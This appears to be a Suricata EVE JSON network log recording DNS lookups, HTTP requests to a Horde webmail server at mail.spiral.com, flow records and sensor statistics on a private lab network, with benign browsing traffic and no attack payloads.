{"timestamp":"2020-02-29T00:16:49.000487+0000","flow_id":223250995218985,"event_type":"flow","src_ip":"192.168.10.122","src_port":58990,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:11:48.199209+0000","end":"2020-02-29T00:11:48.307119+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:49.880408+0000","flow_id":1781907531591448,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45792,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64725,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:49.985303+0000","flow_id":1781907531591448,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45792,"proto":"UDP","dns":{"type":"answer","id":64725,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:16:49.985303+0000","flow_id":1781907531591448,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45792,"proto":"UDP","dns":{"type":"answer","id":64725,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:16:50.000174+0000","event_type":"stats","stats":{"uptime":14662,"capture":{"kernel_packets":136226,"kernel_drops":0},"decoder":{"pkts":136232,"bytes":93672396,"invalid":189,"ipv4":134712,"ipv6":9,"ethernet":136232,"raw":0,"null":0,"sll":0,"tcp":129318,"udp":5190,"sctp":0,"icmpv4":15,"icmpv6":9,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097632},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2800,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2816,"synack":2807,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":144,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1838,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":104,"dcerpc_udp":0,"dns_udp":2374,"failed_udp":112},"tx":{"http":4703,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2454}},"flow_mgr":{"closed_pruned":2777,"new_pruned":15,"est_pruned":2423,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":3,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21489,"memcap_state":0,"memcap_global":0},"http":{"memuse":41010,"memcap":0}}} {"timestamp":"2020-02-29T00:16:50.079654+0000","flow_id":607027817694435,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34862,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/turba\/add.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/add.php","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=oZ_HnvDV1RzcsAiiL_PzNnX&view=Contact","length":20}} {"timestamp":"2020-02-29T00:16:50.089117+0000","flow_id":1807681630395421,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":57626,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":16564,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:50.197597+0000","flow_id":1807681630395421,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57626,"proto":"UDP","dns":{"type":"answer","id":16564,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:16:50.197597+0000","flow_id":1807681630395421,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57626,"proto":"UDP","dns":{"type":"answer","id":16564,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:16:52.000170+0000","flow_id":413251773933581,"event_type":"flow","src_ip":"192.168.10.130","src_port":34844,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":9,"bytes_toserver":1155,"bytes_toclient":7733,"start":"2020-02-29T00:15:44.862221+0000","end":"2020-02-29T00:15:50.145157+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:16:52.301543+0000","flow_id":363769459871467,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34860,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":45},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":27,"tx_id":0}} {"timestamp":"2020-02-29T00:16:53.000301+0000","flow_id":862814588722720,"event_type":"flow","src_ip":"192.168.10.130","src_port":34842,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":1210,"bytes_toclient":890,"start":"2020-02-29T00:15:13.613920+0000","end":"2020-02-29T00:15:52.465705+0000","age":39,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:16:53.000509+0000","flow_id":447486943095378,"event_type":"flow","src_ip":"192.168.10.122","src_port":40980,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:11:52.846418+0000","end":"2020-02-29T00:11:52.954641+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:53.000898+0000","flow_id":2078036930179823,"event_type":"flow","src_ip":"192.168.10.130","src_port":34840,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":28,"pkts_toclient":34,"bytes_toserver":4469,"bytes_toclient":36316,"start":"2020-02-29T00:15:09.176879+0000","end":"2020-02-29T00:15:52.465550+0000","age":43,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:16:56.000995+0000","flow_id":623112466345782,"event_type":"flow","src_ip":"192.168.10.130","src_port":34846,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":10,"bytes_toserver":1143,"bytes_toclient":8792,"start":"2020-02-29T00:15:50.208694+0000","end":"2020-02-29T00:15:55.405377+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:16:57.000323+0000","event_type":"stats","stats":{"uptime":14669,"capture":{"kernel_packets":136283,"kernel_drops":0},"decoder":{"pkts":136286,"bytes":93702366,"invalid":191,"ipv4":134764,"ipv6":9,"ethernet":136286,"raw":0,"null":0,"sll":0,"tcp":129364,"udp":5194,"sctp":0,"icmpv4":15,"icmpv6":9,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097056},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2801,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2817,"synack":2808,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":145,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1839,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":104,"dcerpc_udp":0,"dns_udp":2376,"failed_udp":112},"tx":{"http":4704,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2456}},"flow_mgr":{"closed_pruned":2780,"new_pruned":15,"est_pruned":2425,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":3,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21490,"memcap_state":0,"memcap_global":0},"http":{"memuse":2112,"memcap":0}}} {"timestamp":"2020-02-29T00:16:59.002148+0000","flow_id":2200121362976242,"event_type":"flow","src_ip":"192.168.10.122","src_port":47304,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":2,"pkts_toclient":2,"bytes_toserver":172,"bytes_toclient":282,"start":"2020-02-29T00:11:57.953842+0000","end":"2020-02-29T00:11:58.181226+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:04.000248+0000","event_type":"stats","stats":{"uptime":14676,"capture":{"kernel_packets":136285,"kernel_drops":0},"decoder":{"pkts":136288,"bytes":93702498,"invalid":191,"ipv4":134766,"ipv6":9,"ethernet":136288,"raw":0,"null":0,"sll":0,"tcp":129366,"udp":5194,"sctp":0,"icmpv4":15,"icmpv6":9,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096480},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2801,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2817,"synack":2808,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":145,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1839,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":104,"dcerpc_udp":0,"dns_udp":2376,"failed_udp":112},"tx":{"http":4704,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2456}},"flow_mgr":{"closed_pruned":2781,"new_pruned":15,"est_pruned":2426,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21160,"memcap_state":0,"memcap_global":0},"http":{"memuse":2112,"memcap":0}}} {"timestamp":"2020-02-29T00:17:09.000342+0000","flow_id":173927609846779,"event_type":"flow","src_ip":"fe80:0000:0000:0000:fc16:3eff:fe73:695a","dest_ip":"ff02:0000:0000:0000:0000:0000:0000:0002","proto":"IPv6-ICMP","icmp_type":133,"icmp_code":0,"flow":{"pkts_toserver":1,"pkts_toclient":0,"bytes_toserver":70,"bytes_toclient":0,"start":"2020-02-29T00:16:38.117755+0000","end":"2020-02-29T00:16:38.117755+0000","age":0,"state":"new","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:10.000893+0000","flow_id":544162378397647,"event_type":"flow","src_ip":"192.168.10.81","src_port":52762,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":11,"bytes_toserver":1157,"bytes_toclient":9925,"start":"2020-02-29T00:16:03.964559+0000","end":"2020-02-29T00:16:09.219655+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:17:11.000250+0000","event_type":"stats","stats":{"uptime":14683,"capture":{"kernel_packets":136285,"kernel_drops":0},"decoder":{"pkts":136288,"bytes":93702498,"invalid":191,"ipv4":134766,"ipv6":9,"ethernet":136288,"raw":0,"null":0,"sll":0,"tcp":129366,"udp":5194,"sctp":0,"icmpv4":15,"icmpv6":9,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096192},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2801,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2817,"synack":2808,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":145,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1839,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":104,"dcerpc_udp":0,"dns_udp":2376,"failed_udp":112},"tx":{"http":4704,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2456}},"flow_mgr":{"closed_pruned":2781,"new_pruned":15,"est_pruned":2426,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21160,"memcap_state":0,"memcap_global":0},"http":{"memuse":2032,"memcap":0}}} {"timestamp":"2020-02-29T00:17:14.000486+0000","flow_id":198980151024429,"event_type":"flow","src_ip":"192.168.10.130","src_port":34848,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":1102,"bytes_toclient":774,"start":"2020-02-29T00:15:52.465709+0000","end":"2020-02-29T00:16:13.631724+0000","age":21,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:17:18.000223+0000","event_type":"stats","stats":{"uptime":14690,"capture":{"kernel_packets":136285,"kernel_drops":0},"decoder":{"pkts":136288,"bytes":93702498,"invalid":191,"ipv4":134766,"ipv6":9,"ethernet":136288,"raw":0,"null":0,"sll":0,"tcp":129366,"udp":5194,"sctp":0,"icmpv4":15,"icmpv6":9,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095616},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2801,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2817,"synack":2808,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":145,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1839,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":104,"dcerpc_udp":0,"dns_udp":2376,"failed_udp":112},"tx":{"http":4704,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2456}},"flow_mgr":{"closed_pruned":2783,"new_pruned":16,"est_pruned":2426,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21160,"memcap_state":0,"memcap_global":0},"http":{"memuse":1952,"memcap":0}}} {"timestamp":"2020-02-29T00:17:19.118914+0000","flow_id":1653011270062210,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":44867,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":44829,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:17:19.227917+0000","flow_id":1653011270062210,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44867,"proto":"UDP","dns":{"type":"answer","id":44829,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:17:19.227917+0000","flow_id":1653011270062210,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44867,"proto":"UDP","dns":{"type":"answer","id":44829,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:17:19.438006+0000","flow_id":2225289892430090,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52768,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8119}} {"timestamp":"2020-02-29T00:17:21.000492+0000","flow_id":1584978968453450,"event_type":"flow","src_ip":"192.168.10.122","src_port":54606,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:12:20.598346+0000","end":"2020-02-29T00:12:20.707223+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:21.000827+0000","flow_id":1230407958635898,"event_type":"flow","src_ip":"192.168.10.130","src_port":34850,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":1095,"bytes_toclient":725,"start":"2020-02-29T00:16:13.632186+0000","end":"2020-02-29T00:16:20.087703+0000","age":7,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:17:23.000471+0000","flow_id":1032113613812835,"event_type":"flow","src_ip":"192.168.10.81","src_port":52764,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":1143,"bytes_toclient":712,"start":"2020-02-29T00:16:17.570467+0000","end":"2020-02-29T00:16:22.723356+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:17:23.525111+0000","flow_id":2225289892430090,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52768,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8119},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":47734,"tx_id":0}} {"timestamp":"2020-02-29T00:17:23.536842+0000","flow_id":1688526354854154,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34841,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":31688,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:17:23.645551+0000","flow_id":1688526354854154,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34841,"proto":"UDP","dns":{"type":"answer","id":31688,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:17:23.645551+0000","flow_id":1688526354854154,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34841,"proto":"UDP","dns":{"type":"answer","id":31688,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:17:23.720422+0000","flow_id":2225289892430090,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52768,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5559}} {"timestamp":"2020-02-29T00:17:25.000160+0000","event_type":"stats","stats":{"uptime":14697,"capture":{"kernel_packets":136295,"kernel_drops":0},"decoder":{"pkts":136310,"bytes":93713038,"invalid":191,"ipv4":134787,"ipv6":10,"ethernet":136310,"raw":0,"null":0,"sll":0,"tcp":129385,"udp":5196,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095904},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2802,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2818,"synack":2809,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":145,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1840,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":104,"dcerpc_udp":0,"dns_udp":2377,"failed_udp":112},"tx":{"http":4705,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2457}},"flow_mgr":{"closed_pruned":2784,"new_pruned":16,"est_pruned":2427,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":2,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21489,"memcap_state":0,"memcap_global":0},"http":{"memuse":53624,"memcap":0}}} {"timestamp":"2020-02-29T00:17:26.393012+0000","flow_id":256953625804596,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54415,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":60400,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:17:26.501632+0000","flow_id":256953625804596,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54415,"proto":"UDP","dns":{"type":"answer","id":60400,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:17:26.501632+0000","flow_id":256953625804596,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54415,"proto":"UDP","dns":{"type":"answer","id":60400,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:17:26.651304+0000","flow_id":779573836303470,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34864,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=oZ_HnvDV1RzcsAiiL_PzNnX&view=Contact","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6988}} {"timestamp":"2020-02-29T00:17:27.159302+0000","flow_id":1466579625143878,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":60762,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":35202,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:17:27.267472+0000","flow_id":1466579625143878,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60762,"proto":"UDP","dns":{"type":"answer","id":35202,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 